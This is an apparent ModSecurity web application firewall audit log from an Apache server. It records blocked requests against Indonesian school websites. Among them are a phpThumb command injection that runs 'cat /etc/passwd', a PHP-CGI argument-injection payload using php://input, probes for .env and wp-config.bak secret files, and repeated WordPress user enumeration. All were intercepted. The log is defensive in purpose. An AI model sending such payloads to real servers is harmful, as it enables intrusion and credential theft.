Stopwatch2: 1745578352216803 1486; combined=499, p1=346, p2=124, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e1bd7164-Z--
--11d29167-A--
[25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfgAAANA 103.236.140.4 44726 103.236.140.4 8181
--11d29167-B--
GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137270242
--11d29167-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--11d29167-E--
--11d29167-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578352415231 1559 (- - -)
Stopwatch2: 1745578352415231 1559; combined=594, p1=384, p2=182, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--11d29167-Z--
--6b8f3b08-A--
[25/Apr/2025:17:57:01 +0700] aAtqfeOdEP6frSVs8Cp6CwAAABE 103.236.140.4 45768 103.236.140.4 8181
--6b8f3b08-B--
GET /wp-config.bak HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 5.161.58.65
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 5.161.58.65
X-Forwarded-Proto: http
Connection: close
Accept: */*
--6b8f3b08-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6b8f3b08-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.bak" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578621762024 950 (- - -)
Stopwatch2: 1745578621762024 950; combined=406, p1=363, p2=0, p3=0, p4=0, p5=43, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6b8f3b08-Z--
--ea4a3d31-A--
[25/Apr/2025:19:20:20 +0700] aAt-BD8HMZgF-3Y3GtGGJgAAAE4 103.236.140.4 36820 103.236.140.4 8181
--ea4a3d31-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.137.162
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.137.162
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--ea4a3d31-C--
--ea4a3d31-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ea4a3d31-E--
--ea4a3d31-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745583620207834 5365 (- - -)
Stopwatch2: 1745583620207834 5365; combined=3531, p1=572, p2=2928, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ea4a3d31-Z--
--f446c334-A--
[25/Apr/2025:19:44:31 +0700] aAuDr_Ku9d5eAb6Kn98xCgAAANU 103.236.140.4 42440 103.236.140.4 8181
--f446c334-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 35.204.172.12
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 35.204.172.12
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--f446c334-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f446c334-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745585071480172 3040 (- - -)
Stopwatch2: 1745585071480172 3040; combined=1302, p1=440, p2=830, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f446c334-Z--
--0bb5ac04-A--
[25/Apr/2025:19:50:18 +0700] aAuFCuXF4ZX3hX-IbN7roQAAAIU 103.236.140.4 57112 103.236.140.4 8181
--0bb5ac04-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 193.218.7.162
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 193.218.7.162
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--0bb5ac04-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0bb5ac04-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745585418697492 3098 (- - -)
Stopwatch2: 1745585418697492 3098; combined=1328, p1=457, p2=839, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0bb5ac04-Z--
--54c6dc6c-A--
[25/Apr/2025:19:53:20 +0700] aAuFwD8HMZgF-3Y3GtGMHAAAAFM 103.236.140.4 37904 103.236.140.4 8181
--54c6dc6c-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 45.231.89.91
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.231.89.91
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--54c6dc6c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--54c6dc6c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745585600476063 2103 (- - -)
Stopwatch2: 1745585600476063 2103; combined=1184, p1=409, p2=749, p3=0, p4=0, p5=26, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--54c6dc6c-Z--
--77d91a32-A--
[25/Apr/2025:20:37:09 +0700] aAuQBfKu9d5eAb6Kn99aQQAAAM0 103.236.140.4 37902 103.236.140.4 8181
--77d91a32-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 103.106.192.93
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 103.106.192.93
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--77d91a32-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--77d91a32-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745588229541149 3678 (- - -)
Stopwatch2: 1745588229541149 3678; combined=1804, p1=538, p2=1226, p3=0, p4=0, p5=40, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--77d91a32-Z--
--1e64335e-A--
[25/Apr/2025:20:47:18 +0700] aAuSZvKu9d5eAb6Kn99f3wAAAMo 103.236.140.4 56358 103.236.140.4 8181
--1e64335e-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 45.191.185.45
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.191.185.45
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--1e64335e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1e64335e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745588838324473 2618 (- - -)
Stopwatch2: 1745588838324473 2618; combined=1266, p1=427, p2=810, p3=0, p4=0, p5=29, sr=84, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1e64335e-Z--
--36657c28-A--
[25/Apr/2025:21:22:33 +0700] aAuaqT8HMZgF-3Y3GtGy9gAAAEw 103.236.140.4 36276 103.236.140.4 8181
--36657c28-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G925F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--36657c28-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--36657c28-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745590953193642 797 (- - -)
Stopwatch2: 1745590953193642 797; combined=343, p1=295, p2=0, p3=0, p4=0, p5=47, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--36657c28-Z--
--2e3bd624-A--
[25/Apr/2025:21:25:13 +0700] aAubSfKu9d5eAb6Kn99h5QAAAMk 103.236.140.4 36892 103.236.140.4 8181
--2e3bd624-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 104.248.209.195
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 104.248.209.195
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--2e3bd624-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2e3bd624-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745591113976380 762 (- - -)
Stopwatch2: 1745591113976380 762; combined=314, p1=273, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2e3bd624-Z--
--8ac4c474-A--
[25/Apr/2025:21:53:15 +0700] aAuh2-OdEP6frSVs8Cq4XQAAAAo 103.236.140.4 43314 103.236.140.4 8181
--8ac4c474-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 27.147.238.170
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 27.147.238.170
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--8ac4c474-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8ac4c474-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745592795930163 3405 (- - -)
Stopwatch2: 1745592795930163 3405; combined=1555, p1=499, p2=965, p3=0, p4=0, p5=91, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8ac4c474-Z--
--d186fa28-A--
[25/Apr/2025:22:19:25 +0700] aAun_T8HMZgF-3Y3GtG1ZAAAAEA 103.236.140.4 49394 103.236.140.4 8181
--d186fa28-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 27.131.15.206
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 27.131.15.206
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--d186fa28-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d186fa28-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745594365184642 2558 (- - -)
Stopwatch2: 1745594365184642 2558; combined=1211, p1=400, p2=782, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d186fa28-Z--
--aa447359-A--
[25/Apr/2025:22:24:49 +0700] aAupQeOdEP6frSVs8Cq6owAAABU 103.236.140.4 50628 103.236.140.4 8181
--aa447359-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.70.87
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.70.87
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.39 Safari/537.36
Accept-Charset: utf-8
--aa447359-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aa447359-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745594689613208 825 (- - -)
Stopwatch2: 1745594689613208 825; combined=349, p1=315, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aa447359-Z--
--06471c78-A--
[25/Apr/2025:22:59:06 +0700] aAuxSuXF4ZX3hX-IbN4b2gAAAJA 103.236.140.4 49256 103.236.140.4 8181
--06471c78-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 200.211.3.152
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 200.211.3.152
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--06471c78-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--06471c78-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745596746246451 3147 (- - -)
Stopwatch2: 1745596746246451 3147; combined=1307, p1=420, p2=854, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--06471c78-Z--
--31f4086c-A--
[25/Apr/2025:23:05:26 +0700] aAuyxuOdEP6frSVs8CrCbAAAAAU 103.236.140.4 56306 103.236.140.4 8181
--31f4086c-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 41.170.88.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 41.170.88.195
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--31f4086c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--31f4086c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745597126104948 2660 (- - -)
Stopwatch2: 1745597126104948 2660; combined=1130, p1=410, p2=696, p3=0, p4=0, p5=24, sr=101, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--31f4086c-Z--
--3414275d-A--
[25/Apr/2025:23:43:19 +0700] aAu7p_Ku9d5eAb6Kn998LAAAAM8 103.236.140.4 50914 103.236.140.4 8181
--3414275d-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 182.176.2.37
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.176.2.37
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--3414275d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3414275d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745599399552532 2696 (- - -)
Stopwatch2: 1745599399552532 2696; combined=1217, p1=405, p2=783, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3414275d-Z--
--d3f49b71-A--
[26/Apr/2025:00:14:03 +0700] aAvC2-XF4ZX3hX-IbN400AAAAJU 103.236.140.4 60286 103.236.140.4 8181
--d3f49b71-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.248.82.54
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.248.82.54
X-Forwarded-Proto: https
Connection: close
